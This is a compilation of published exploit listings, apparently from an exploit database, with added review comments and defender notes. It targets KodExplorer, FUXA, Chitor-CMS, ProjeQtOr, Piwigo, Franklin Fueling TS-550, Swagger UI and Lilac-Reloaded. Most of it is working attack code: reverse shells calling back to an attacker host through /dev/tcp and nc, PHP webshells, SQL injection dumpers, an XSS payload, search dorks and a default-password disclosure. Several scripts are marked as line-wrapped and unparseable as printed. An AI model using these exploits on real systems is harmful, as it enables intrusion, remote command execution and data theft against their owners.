# Exploit Title: KodExplorer <= 4.49 - CSRF to Arbitrary File Upload
# Date: 21/04/2023
# Exploit Author: Mr Empy
# Software Link: https://github.com/kalcaddle/KodExplorer
# Version: <= 4.49
# Tested on: Linux
# References:
# * https://vuldb.com/?id.227000
# * https://www.cve.org/CVERecord?id=CVE-2022-4944
# * https://github.com/MrEmpy/CVE-2022-4944
#
# NOTE(review): the published listing was line-wrapped.  Several string
# literals below (the "Send this URI" f-strings, `rvpayload`, the argparse
# help texts) are split across physical lines and do not parse as printed;
# the original indentation was also lost and has been reconstructed.
#
# What the script exercises: one GET to
#   index.php?explorer/serverDownload&type=download&savePath=<path>&url=<remote>
# makes the KodExplorer server fetch <remote> and store it under <path>
# (here the admin user's home directory under data/User/).  The request
# carries no anti-CSRF token, so a logged-in user who opens the link performs
# the fetch on the attacker's behalf.  Only versions <= 4.49 are listed as
# affected (references above).
# Defender notes: require a CSRF token / SameSite session cookie on this
# endpoint, restrict savePath to the requesting user's own storage, and do
# not let the web server execute PHP out of data/User/*/home/.  Detection:
# access-log hits on explorer/serverDownload whose url= points off-host, and
# new .php files appearing under data/User/*/home/.

import argparse
import http.server
import socketserver
import os
import threading
import requests
from time import sleep


def banner():
    """Print the ASCII-art banner (the art itself is mangled by line wrapping)."""
    print('''
 _ _____________ _____ _ ______ _____
 _____
| | / / _ | _ \ ___| | | | ___ \/ __ \|
 ___|
| |/ /| | | | | | | |____ ___ __ | | ___ _ __ ___ _ __ | |_/ /| / \/|
|__
| \| | | | | | | __\ \/ / '_ \| |/ _ \| '__/ _ \ '__| | / | | |
 __|
| |\ \ \_/ / |/ /| |___> <| |_) | | (_) | | | __/ | | |\ \ | \__/\|
|___
\_| \_/\___/|___/ \____/_/\_\ .__/|_|\___/|_| \___|_| \_| \_|
\____/\____/
 | |

 |_|

 [KODExplorer <= v4.49 Remote Code Executon]
 [Coded by MrEmpy]

''')


def httpd():
    """Serve the ./http directory next to this script over plain HTTP.

    Changes the process working directory to <script dir>/http, binds
    port 8080 on all interfaces ('') with SimpleHTTPRequestHandler and
    blocks in serve_forever().  Callers run it in a daemon-less thread and
    never shut it down, so the process only ends when killed.
    """
    port = 8080
    httpddir = os.path.join(os.path.dirname(__file__), 'http')
    os.chdir(httpddir)
    Handler = http.server.SimpleHTTPRequestHandler
    httpd = socketserver.TCPServer(('', port), Handler)
    print('[+] HTTP Server started')
    httpd.serve_forever()


def webshell(url, lhost):
    """Stage a one-line PHP file and print the CSRF link that makes the target fetch it.

    Args:
        url:   base URL of the KodExplorer instance.
        lhost: address the target must reach back to on port 8080.
    Side effects: writes http/shell.php (relative to the current directory),
    starts the httpd() thread, prompts on stdin for the install path.
    """
    payload = '<pre><?php system($_GET["cmd"])?></pre>'
    path = '/data/User/admin/home/'  # assigned but never used

    targetpath = input('[*] Target KODExplorer path (ex /var/www/html): ')
    wshell_f = open('http/shell.php', 'w')
    wshell_f.write(payload)
    wshell_f.close()
    print('[*] Opening HTTPd port')
    th = threading.Thread(target=httpd)
    th.start()
    # The f-strings below were wrapped in the published listing and span
    # several physical lines; as printed they are not valid Python.
    print(f'[+] Send this URI to your target:
{url}/index.php?explorer/serverDownload&type=download&savePath={targetpath}/data/User/admin/home/&url=http://
{lhost}:8080/shell.php&uuid=&time=')
    print(f'[+] After the victim opens the URI, his shell will be hosted at
{url}/data/User/admin/home/shell.php?cmd=whoami')


def reverseshell(url, lhost):
    """Stage a reverse-shell PHP file, print the CSRF link, then poll for it.

    Downloads the pentestmonkey script at runtime (rvpayload, over HTTPS),
    substitutes the listener host/port, serves it via httpd() and then polls
    the expected upload location once a second until an HTTP 200 is seen.
    Note: the loop has no timeout or error handling; a connection error from
    requests.get propagates and any non-200 status keeps it spinning.
    """
    rvpayload = '
https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
'  # wrapped in the listing: the URL literal is split across lines
    path = '/data/User/admin/home/'  # assigned but never used

    targetpath = input('[*] Target KODExplorer path (ex /var/www/html): ')
    lport = input('[*] Your local port: ')
    reqpayload = requests.get(rvpayload).text
    reqpayload = reqpayload.replace('127.0.0.1', lhost)
    reqpayload = reqpayload.replace('1234', lport)
    wshell_f = open('http/shell.php', 'w')
    wshell_f.write(reqpayload)
    wshell_f.close()
    print('[*] Opening HTTPd port')
    th = threading.Thread(target=httpd)
    th.start()
    print(f'[+] Send this URI to your target:
{url}/index.php?explorer/serverDownload&type=download&savePath={targetpath}/data/User/admin/home/&url=http://
{lhost}:8080/shell.php&uuid=&time=')
    input(f'[*] Run the command "nc -lnvp {lport}" to receive the
connection and press any key\n')
    while True:
        # A 200 on the staged path is taken as "the upload happened".
        hitshell = requests.get(f'{url}/data/User/admin/home/shell.php')
        sleep(1)
        if not hitshell.status_code == 200:
            continue
        else:
            print('[+] Shell sent and executed!')
            break


def main(url, lhost, mode):
    """Dispatch on mode ('webshell' or 'reverse'); anything else prints an error."""
    banner()
    if mode == 'webshell':
        webshell(url, lhost)
    elif mode == 'reverse':
        reverseshell(url, lhost)
    else:
        print('[-] There is no such mode. Use webshell or reverse')


if __name__ == "__main__":
    # Three required options; the help strings are wrapped in the listing.
    parser = argparse.ArgumentParser()
    parser.add_argument('-u','--url', action='store', help='target url',
dest='url', required=True)
    parser.add_argument('-lh','--local-host', action='store', help='local
host', dest='lhost', required=True)
    parser.add_argument('-m','--mode', action='store', help='mode
(webshell, reverse)', dest='mode', required=True)
    arguments = parser.parse_args()
    main(arguments.url, arguments.lhost, arguments.mode)
# Exploit Title: FUXA V.1.1.13-1186- Unauthenticated Remote Code Execution (RCE)
# Date: 18/04/2023
# Exploit Author: Rodolfo Mariano
# Vendor Homepage: https://github.com/frangoteam/FUXA
# Version: FUXA V.1.1.13-1186 (current)
#
# NOTE(review): the request below carries no credentials or session cookie,
# which is what "Unauthenticated" in the title refers to: POST /api/runscript
# evaluates the caller-supplied "code" field server-side in Node (the payload
# calls require('child_process').exec).  Indentation was reconstructed from
# the wrapped listing.
# Defender notes: put /api/runscript behind authentication and do not
# evaluate caller-supplied script text at all.  Detection: POST bodies to
# /api/runscript containing child_process / exec, and unexpected outbound TCP
# connections from the FUXA host (the payload opens /dev/tcp/<lhost>/<lport>).

from argparse import RawTextHelpFormatter
import argparse, sys, threading, requests  # sys and threading are never used


def main(rhost, rport, lhost, lport):
    """Build the runscript JSON body and POST it once.

    Args:
        rhost, rport: target host and port (strings; rport is concatenated).
        lhost, lport: listener host and port substituted into "code".
    The HTTP response is assigned but never inspected, so nothing is
    printed or returned on success or failure.
    """
    url = "http://"+rhost+":"+rport+"/api/runscript"
    payload = {
        "headers":
        {
            "normalizedNames":{},
            "lazyUpdate": "null"
        },
        "params":{
            "script":{
                "parameters":[
                    {
                        "name":"ok",
                        "type":"tagid",
                        "value":""
                    }
                ],
                "mode":"",
                "id":"",
                "test":"true",
                "name":"ok",
                "outputId":"",
                # Server-side script text; this is the field the endpoint executes.
                "code":"require('child_process').exec('/bin/bash -c \"/bin/sh -i >& /dev/tcp/%s/%s 0>&1\"')" % (lhost,lport)
            }
        }
    }
    response = requests.post(url, json=payload)


args = None
parser = argparse.ArgumentParser(formatter_class=RawTextHelpFormatter, usage="python exploit.py --rhosts <ip> --rport <rport>--lport <port>")
parser.add_argument('--rhost', dest='rhost', action='store', type=str, help='insert an rhost')
# NOTE(review): the default is an int while type=str; main() concatenates rport as a string.
parser.add_argument('--rport', dest='rport', action='store', type=str, help='insert an rport', default=1881)
parser.add_argument('--lhost', dest='lhost', action='store', type=str, help='insert an lhost')
parser.add_argument('--lport', dest='lport', action='store', type=str, help='insert an lport')

args=parser.parse_args()
main(args.rhost, args.rport, args.lhost, args.lport)
#!/usr/bin/python3

#######################################################
# #
# Exploit Title: Chitor-CMS v1.1.2 - Pre-Auth SQL Injection #
# Date: 2023/04/13 #
# ExploitAuthor: msd0pe #
# Project: https://github.com/waqaskanju/Chitor-CMS #
# My Github: https://github.com/msd0pe-1 #
# Patched the 2023/04/16: 69d3442 commit #
# #
#######################################################
#
# NOTE(review): indentation was lost when this listing was published; the
# nesting below (especially inside Main()) is reconstructed and should be
# checked against the original before being relied on.
#
# Injection point used throughout: the `id` query parameter of
# /edit_school.php, closed with a quote and extended with UNION ALL SELECT.
# The hex constants are delimiters so the result can be cut out of the HTML:
#   0x71707a6b71 = "qpzkq", 0x716a6b6271 = "qjkbq", 0x787a6d64706c = "xzmdpl".
# Defender notes: the header says the project fixed this in commit 69d3442;
# the durable fix is a parameterised query for `id`.  Detection: request URIs
# to edit_school.php containing UNION ALL SELECT / INFORMATION_SCHEMA or the
# marker constants above.

__description__ = 'Chitor-CMS < 1.1.2 Pre-Auth SQL Injection.'
__author__ = 'msd0pe'
__version__ = '1.1'
__date__ = '2023/04/13'


class bcolors:
    # ANSI SGR escape sequences used to colour terminal output.
    PURPLE = '\033[95m'
    BLUE = '\033[94m'
    GREEN = '\033[92m'
    OCRA = '\033[93m'
    RED = '\033[91m'
    CYAN = '\033[96m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'


class infos:
    # Pre-built "[?] ", "[X] ", "[+] ", "[*] " prefixes; only PROCESS is used below.
    INFO = "[" + bcolors.OCRA + bcolors.BOLD + "?" + bcolors.ENDC + bcolors.ENDC + "] "
    ERROR = "[" + bcolors.RED + bcolors.BOLD + "X" + bcolors.ENDC + bcolors.ENDC + "] "
    GOOD = "[" + bcolors.GREEN + bcolors.BOLD + "+" + bcolors.ENDC + bcolors.ENDC + "] "
    PROCESS = "[" + bcolors.BLUE + bcolors.BOLD + "*" + bcolors.ENDC + bcolors.ENDC + "] "


import re
import requests
import optparse
from prettytable import PrettyTable  # third-party dependency


def DumpTable(url, database, table):
    """Print the rows of database.table as a PrettyTable.

    Two requests: the first reads column names from INFORMATION_SCHEMA.COLUMNS,
    the second selects those columns (joined with "xzmdpl") from the table.
    Errors in the first step are swallowed by a bare except, which leaves
    `columns` empty and makes the second query malformed.
    """
    header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}
    x = PrettyTable()
    columns = []
    payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ccolumn_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=\"" + table + "\" AND table_schema=\"" + database + "\"-- -"
    u = requests.get(url + payload, headers=header)
    try:
        # JSON_ARRAYAGG output appears between the qpzkq[ ... ]qjkbq markers.
        r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
        r = r[0].replace('\"',"").split(',')
        if r == []:
            pass
        else:
            for i in r:
                columns.append(i)
            pass
    except:
        pass  # no match / IndexError silently ignored
    x.field_names = columns
    # str(columns) with brackets, quotes and spaces stripped -> "c1,c2,c3".
    payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2C " + str(columns).replace("[","").replace("]","").replace("\'","").replace(" ","") + "))%2C0x716a6b6271) FROM " + database + "." + table + "-- -"
    u = requests.get(url + payload, headers=header)
    try:
        r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
        r = r[0].replace('\"',"").split(',')
        if r == []:
            pass
        else:
            for i in r:
                i = i.split("xzmdpl")
                x.add_rows([i])
    except ValueError:
        # Same parse, but each row is padded with one empty cell -- presumably
        # to satisfy a field-count mismatch raised by add_rows (TODO confirm).
        r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
        r = r[0].replace('\"',"").split(',')
        if r == []:
            pass
        else:
            for i in r:
                i = i.split("xzmdpl")
                i.append("")
                x.add_rows([i])
    print(x)


def ListTables(url, database):
    """Print the table names of `database` (INFORMATION_SCHEMA.TABLES).

    The schema name is passed as a hex literal (0x...) rather than quoted.
    Any parsing error is swallowed and an empty table is printed.
    """
    header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}
    x = PrettyTable()
    x.field_names = ["TABLES"]
    payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ctable_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x" + str(database).encode('utf-8').hex() + ")-- -"
    u = requests.get(url + payload, headers=header)
    try:
        r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
        r = r[0].replace('\"',"").split(',')
        if r == []:
            pass
        else:
            for i in r:
                x.add_row([i])
    except:
        pass
    print(x)


def ListDatabases(url):
    """Print all schema names (INFORMATION_SCHEMA.SCHEMATA); errors are swallowed."""
    header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}
    x = PrettyTable()
    x.field_names = ["DATABASES"]
    payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Cschema_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.SCHEMATA-- -"
    u = requests.get(url + payload, headers=header)
    try:
        r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
        r = r[0].replace('\"',"").split(',')
        if r == []:
            pass
        else:
            for i in r:
                x.add_row([i])
    except:
        pass
    print(x)


def Main():
    """Parse the command line and dispatch to the list/dump helpers.

    With no options at all (optparse.Values compares equal to a dict of its
    attributes) or with stray positional arguments, the help text is shown.
    The Examples group is added after parse_args(), so it never appears in
    the generated help.
    """
    Menu = optparse.OptionParser(usage='python %prog [options]', version='%prog ' + __version__)
    Menu.add_option('-u', '--url', type="str", dest="url", help='target url')
    Menu.add_option('--dbs', action="store_true", dest="l_databases", help='list databases')
    Menu.add_option('-D', '--db', type="str", dest="database", help='select a database')
    Menu.add_option('--tables', action="store_true", dest="l_tables", help='list tables')
    Menu.add_option('-T', '--table', type="str", dest="table", help='select a table')
    Menu.add_option('--dump', action="store_true", dest="dump", help='dump the content')
    (options, args) = Menu.parse_args()

    Examples = optparse.OptionGroup(Menu, "Examples", """python3 chitor1.1.py -u http://127.0.0.1 --dbs
 python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db --tables
 python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db -T login --dump
 """)
    Menu.add_option_group(Examples)

    if len(args) != 0 or options == {'url': None, 'l_databases': None, 'database': None, 'l_tables': None, 'table': None, 'dump': None}:
        Menu.print_help()
        print('')
        print(' %s' % __description__)
        print(' Source code put in public domain by ' + bcolors.PURPLE + bcolors.BOLD + 'msd0pe' + bcolors.ENDC + bcolors.ENDC + ',' + bcolors.RED + bcolors.BOLD + 'no Copyright' + bcolors.ENDC + bcolors.ENDC)
        print(' Any malicious or illegal activity may be punishable by law')
        print(' Use at your own risk')

    elif len(args) == 0:
        # Nesting reconstructed: --tables and --dump both require -D.
        try:
            if options.url != None:
                if options.l_databases != None:
                    ListDatabases(options.url)
                if options.database != None:
                    if options.l_tables != None:
                        ListTables(options.url, options.database)
                    if options.table != None:
                        if options.dump != None:
                            DumpTable(options.url, options.database, options.table)
        except:
            print("Unexpected error")  # the actual exception is discarded


if __name__ == '__main__':
    try:
        Main()

    except KeyboardInterrupt:
        print()
        print(infos.PROCESS + "Exiting...")
        print()
        exit(1)
<pre><code>Exploit Title: ProjeQtOr Project Management System 10.3.2 - Remote Code Execution (RCE)<br />Application: ProjeQtOr Project Management System<br />Version: 10.3.2<br />Bugs: Remote Code Execution (RCE) (Authenticated) via file upload<br />Technology: PHP<br />Vendor URL: https://www.projeqtor.org<br />Software Link: https://sourceforge.net/projects/projectorria/files/projeqtorV10.3.2.zip/download<br />Date found: 19.04.2023<br />Author: Mirabbas Ağalarov<br />Tested on: Linux <br /><br /><br />2. Technical Details & POC<br />========================================<br />A PHP file with a .phar extension can be uploaded where an image attachment is expected. RCE is triggered when the uploaded file is visited afterwards.<br /><br />Payload:<?php echo system("id"); ?><br /><br />poc request:<br /><br /><br />POST /projeqtor/tool/saveAttachment.php?csrfToken= HTTP/1.1<br />Host: localhost<br />Content-Length: 1177<br />sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"<br />Accept: application/json<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryY0bpJaQzcvQberWR<br />X-Requested-With: XMLHttpRequest<br />sec-ch-ua-mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36<br />sec-ch-ua-platform: "Linux"<br />Origin: http://localhost<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: http://localhost/projeqtor/view/main.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: currency=USD; PHPSESSID=2mmnca4p7m93q1nmbg6alskiic<br />Connection: close<br /><br />------WebKitFormBoundaryY0bpJaQzcvQberWR<br />Content-Disposition: form-data; name="attachmentFiles[]"; filename="miri.phar"<br />Content-Type: application/octet-stream<br /><br /><?php echo system("id"); ?><br /><br />------WebKitFormBoundaryY0bpJaQzcvQberWR<br />Content-Disposition: form-data; name="attachmentId"<br /><br /><br 
/>------WebKitFormBoundaryY0bpJaQzcvQberWR<br />Content-Disposition: form-data; name="attachmentRefType"<br /><br />User<br />------WebKitFormBoundaryY0bpJaQzcvQberWR<br />Content-Disposition: form-data; name="attachmentRefId"<br /><br />1<br />------WebKitFormBoundaryY0bpJaQzcvQberWR<br />Content-Disposition: form-data; name="attachmentType"<br /><br />file<br />------WebKitFormBoundaryY0bpJaQzcvQberWR<br />Content-Disposition: form-data; name="MAX_FILE_SIZE"<br /><br />10485760<br />------WebKitFormBoundaryY0bpJaQzcvQberWR<br />Content-Disposition: form-data; name="attachmentLink"<br /><br /><br />------WebKitFormBoundaryY0bpJaQzcvQberWR<br />Content-Disposition: form-data; name="attachmentDescription"<br /><br /><br />------WebKitFormBoundaryY0bpJaQzcvQberWR<br />Content-Disposition: form-data; name="attachmentPrivacy"<br /><br />1<br />------WebKitFormBoundaryY0bpJaQzcvQberWR<br />Content-Disposition: form-data; name="uploadType"<br /><br />html5<br />------WebKitFormBoundaryY0bpJaQzcvQberWR--<br /><br /><br /><br /><br />visit: http://localhost/projeqtor/files/attach/attachment_5/miri.phar<br /><br /></code></pre>
<pre><code>Exploit Title: Piwigo 13.6.0 - Stored Cross-Site Scripting (XSS)<br />Application: Piwigo<br />Version: 13.6.0 <br />Bugs: Stored XSS<br />Technology: PHP<br />Vendor URL: https://piwigo.org/<br />Software Link: https://piwigo.org/get-piwigo<br />Date found: 18.04.2023<br />Author: Mirabbas Ağalarov<br />Tested on: Linux <br /><br /><br />2. Technical Details & POC<br />========================================<br />steps: <br /><br />1. After uploading an image, enter <img%20src=x%20onerror=alert(4)> as the tag (keyword) while editing the image.<br />payload: <img%20src=x%20onerror=alert(4)><br /><br /><br />POST /piwigo/admin.php?page=photo-9 HTTP/1.1<br />Host: localhost<br />Content-Length: 159<br />Cache-Control: max-age=0<br />sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Linux"<br />Upgrade-Insecure-Requests: 1<br />Origin: http://localhost<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://localhost/piwigo/admin.php?page=photo-9<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: pwg_id=u7tjlue5o3vj7fbgb0ikodmb9m; phavsz=1394x860x1; pwg_display_thumbnail=display_thumbnail_classic; pwg_tags_per_page=100; phpbb3_ay432_k=; phpbb3_ay432_u=2; phpbb3_ay432_sid=9240ca5fb9f93c8ebc8ff7bd42c380fe<br />Connection: close<br /><br />name=Untitled&author=&date_creation=&associate%5B%5D=1&tags%5B%5D=<img%20src=x%20onerror=alert(3)>&description=&level=0&pwg_token=bad904d2c7ec866bfba391bfc130ddd2&submit=Save+settings<br /><br /></code></pre>
<pre><code># Exploit Title: Franklin Fueling Systems TS-550 - Default Password<br /># Date: 4/16/2023<br /># Exploit Author: parsa rezaie khiabanloo<br /># Vendor Homepage: Franklin Fueling Systems (http://www.franklinfueling.com/)<br /># Version: TS-550<br /># Tested on: Linux/Android(termux)<br /><br />Step 1 : an attacker can use these dorks to find exposed panels<br /><br />inurl:"relay_status.html"<br /><br />inurl:"fms_compliance.html"<br /><br />inurl:"fms_alarms.html"<br /><br />inurl:"system_status.html"<br /><br />inurl:"system_reports.html"<br /><br />inurl:"tank_status.html"<br /><br />inurl:"sensor_status.html"<br /><br />inurl:"tank_control.html"<br /><br />inurl:"fms_reports.html"<br /><br />inurl:"correction_table.html"<br /><br />Step 2 : the attacker can send this request <br /><br />curl -H "Content-Type:text/xml" --data '<TSA_REQUEST_LIST><TSA_REQUEST COMMAND="cmdWebGetConfiguration"/></TSA_REQUEST_LIST>' http://IP:10001/cgi-bin/tsaws.cgi<br /><br /><br />Step 3 : if the response looks like this <br /><br /><TSA_RESPONSE_LIST VERSION="2.0.0.6833" TIME_STAMP="2013-02-19T22:09:22Z" TIME_STAMP_LOCAL="2013-02-19T17:09:22" KEY="11111111" ROLE="roleGuest"><TSA_RESPONSE COMMAND="cmdWebGetConfiguration"><CONFIGURATION><br /> <DEBUGGING LOGGING_ENABLED="false" LOGGING_PATH="/tmp"/><br /> <ROLE_LIST><br /> <ROLE NAME="roleAdmin" PASSWORD="YrKMc2T2BuGvQ"/><br /> <ROLE NAME="roleUser" PASSWORD="2wd2DlEKUPTr2"/><br /> <ROLE NAME="roleGuest" PASSWORD="YXFCsq2GXFQV2"/><br /> </ROLE_LIST><br /><br /><br />Step 4 : the attacker can crack the hashes using John the Ripper <br /><br />notice : on most panels the password is : admin<br /><br />Disclaimer:<br />The information provided in this advisory is provided "as is" without<br />warranty of any kind. Trustwave disclaims all warranties, either express or<br />implied, including the warranties of merchantability and fitness for a<br />particular purpose. 
In no event shall Trustwave or its suppliers be liable<br />for any damages whatsoever including direct, indirect, incidental,<br />consequential, loss of business profits or special damages, even if<br />Trustwave or its suppliers have been advised of the possibility of such<br />damages. Some states do not allow the exclusion or limitation of liability<br />for consequential or incidental damages so the foregoing limitation may not<br />apply.<br /><br /></code></pre>
# Exploit Title: Swagger UI 4.1.3 - User Interface (UI) Misrepresentation of Critical Information
# Date: 14 April, 2023
# Exploit Author: Rafael Cintra Lopes
# Vendor Homepage: https://swagger.io/
# Version: < 4.1.3
# CVE: CVE-2018-25031
# Site: https://rafaelcintralopes.com.br/

# Usage: python swagger-exploit.py https://[swagger-page].com
#
# NOTE(review): this is a detection script, not an exploit.  It loads the
# target Swagger UI page twice with a `configUrl=` and a `url=` query
# parameter pointing at a non-existent spec, records the browser's network
# log, and reports "[Possibly Vulnerable]" if the page tried to fetch the
# attacker-supplied spec URL -- i.e. the UI still honours spec locations
# taken from the query string.  Indentation was reconstructed from the
# wrapped listing.
# Defender notes: upgrade Swagger UI to 4.1.3 or later and keep query-string
# configuration disabled (the `queryConfigEnabled` option -- confirm for your
# version); detection: requests to the Swagger UI page with url= / configUrl=
# pointing at an external host.

from selenium import webdriver  # third-party; needs a chromedriver binary
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from selenium.webdriver.chrome.service import Service
import time
import json
import sys

if __name__ == "__main__":

    target = sys.argv[1]  # no check that an argument was given

    # Ask Chrome to keep a full performance (DevTools network) log.
    desired_capabilities = DesiredCapabilities.CHROME
    desired_capabilities["goog:loggingPrefs"] = {"performance": "ALL"}

    options = webdriver.ChromeOptions()
    options.add_argument("--headless")
    options.add_argument("--ignore-certificate-errors")
    options.add_argument("--log-level=3")
    options.add_experimental_option("excludeSwitches", ["enable-logging"])

    # Browser webdriver path (hard-coded Windows location).
    drive_service = Service("C:/chromedriver.exe")

    driver = webdriver.Chrome(service=drive_service,
                              options=options,
                              desired_capabilities=desired_capabilities)

    # Two probes: one via configUrl=, one via url=.  Fixed 10 s waits.
    driver.get(target+"?configUrl=https://petstore.swagger.io/v2/hacked1.json")
    time.sleep(10)
    driver.get(target+"?url=https://petstore.swagger.io/v2/hacked2.json")
    time.sleep(10)

    logs = driver.get_log("performance")

    # Persist only the Network.* events as a JSON array; the trailing "{}"
    # element exists so the last comma stays valid JSON.
    with open("log_file.json", "w", encoding="utf-8") as f:
        f.write("[")

        for log in logs:
            log_file = json.loads(log["message"])["message"]

            if("Network.response" in log_file["method"]
                or "Network.request" in log_file["method"]
                or "Network.webSocket" in log_file["method"]):

                f.write(json.dumps(log_file)+",")
        f.write("{}]")

    driver.quit()

    json_file_path = "log_file.json"
    with open(json_file_path, "r", encoding="utf-8") as f:
        logs = json.loads(f.read())

    # Events without params.request.url (responses, the "{}" filler) raise
    # KeyError and are skipped by the broad except.
    for log in logs:
        try:
            url = log["params"]["request"]["url"]

            if(url == "https://petstore.swagger.io/v2/hacked1.json"):
                print("[Possibly Vulnerable] " + target + "?configUrl=https://petstore.swagger.io/v2/swagger.json")

            if(url == "https://petstore.swagger.io/v2/hacked2.json"):
                print("[Possibly Vulnerable] " + target + "?url=https://petstore.swagger.io/v2/swagger.json")

        except Exception as e:
            pass
#!/usr/bin/env python

"""
# Exploit Title: Lilac-Reloaded for Nagios 2.0.8 - Remote Code Execution (RCE)
# Google Dork: N/A
# Date: 2023-04-13
# Exploit Author: max / Zoltan Padanyi
# Vendor Homepage: https://exchange.nagios.org/directory/Addons/Configuration/Lilac-2DReloaded/visit
# Software Link: https://sourceforge.net/projects/lilac--reloaded/files/latest/download
# Version: 2.0.8
# Tested on: Debian 7.6
# CVE : N/A

The autodiscovery feature lacks any kind of input filtering, so we can add our own commands there terminated with a ;

Use at your own risk!

RCA - wild exec is ongoing without any filtering

in library/Net/Traceroute.php

 181 function _setTraceroutePath($sysname)
 182 {
 183 $status = '';
 184 $output = array();
 185 $traceroute_path = '';
 186
 187 if ("windows" == $sysname) {
 188 return "tracert";
 189 } else {
 190 $traceroute_path = exec("which traceroute", $output, $status);
 [...]
 257 function traceroute($host)
 258 {
 259
 260 $argList = $this->_createArgList();
 261 $cmd = $this->_traceroute_path." ".$argList[0]." ".$host." ".$argList[1];
 262 exec($cmd, $this->_result);


"""

# NOTE(review): the user-controlled form field that reaches exec() here is
# `nmap_binary` in the autodiscover POST body; the script sends a shell
# snippet in that field.  No session cookie is sent, and the script does not
# state whether autodiscovery.php requires login -- treat the pre-auth
# question as unconfirmed.  Indentation was reconstructed from the wrapped
# listing, and the -u help string is split across two physical lines.
# Defender notes: pass user-supplied paths through escapeshellarg() or,
# better, restrict nmap_binary to an allow-listed path; detection: POSTs to
# autodiscovery.php whose nmap_binary contains shell metacharacters
# (; | > mkfifo nc), and outbound connections spawned by the web server.

import requests  # third-party dependency
import argparse

parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", help="The full path of the autodiscover.php in lilac (i.e. http://127.0.0.1/lilac/autodiscovery.php", required=True)
parser.add_argument("-i", "--ip", help="Listener IP", required=True)
parser.add_argument("-p", "--port", help="Listener port", required=True, type=int)
args = parser.parse_args()

# Shell snippet placed in the nmap_binary field; the trailing ';' terminates
# it before whatever the application appends (see the RCA above).
rev_shell = f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {args.ip} {args.port} >/tmp/f;"

body = {"request":"autodiscover","job_name":"HackThePlanet","job_description":"HackThePlanet","nmap_binary":rev_shell,"default_template":"","target[2]":"1.1.1.1"}

try:
    # A plain GET first, only to confirm the URL answers 2xx/3xx (r.ok).
    r = requests.get(args.url)
    if r.ok:
        print("[+] URL looks good...moving forward...")
        print("[+] Sending exploit in...")
        r = requests.post(args.url,data=body)
        # r.ok only says the POST was accepted; it does not prove execution.
        if r.ok:
            print("[+] Got HTTP 200, check your listener!")
        else:
            print("[-] Some kind of error happened, check the http response below!")
            print(r.text)
except Exception as e:
    print("General exception: " + str(e))
